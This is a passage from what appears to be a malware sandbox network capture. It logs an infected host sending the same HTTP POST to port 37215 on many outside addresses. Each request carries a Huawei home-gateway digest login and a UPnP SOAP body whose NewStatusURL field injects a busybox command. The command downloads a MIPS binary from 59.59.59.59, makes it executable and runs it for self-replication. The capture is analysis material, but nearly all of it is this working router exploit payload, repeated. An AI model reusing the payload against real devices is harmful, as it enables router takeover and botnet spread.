20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1193192.168.2.1537430157.182.40.6937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.737850904 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1194192.168.2.154816441.21.175.15437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.737880945 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1195192.168.2.1538162112.99.4.16337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.737905025 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1196192.168.2.155851841.141.222.22337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.737941027 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1197192.168.2.155816841.92.64.17337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.738070011 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1198192.168.2.1535576157.228.213.8837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.738095045 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1199192.168.2.153391441.78.193.8137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.738301992 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1200192.168.2.1551154197.120.55.21137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.738353968 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1201192.168.2.1543822157.124.20.6437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.739037991 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1202192.168.2.1543900114.90.119.2737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.740792990 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1203192.168.2.15462061.33.240.16837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.740817070 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
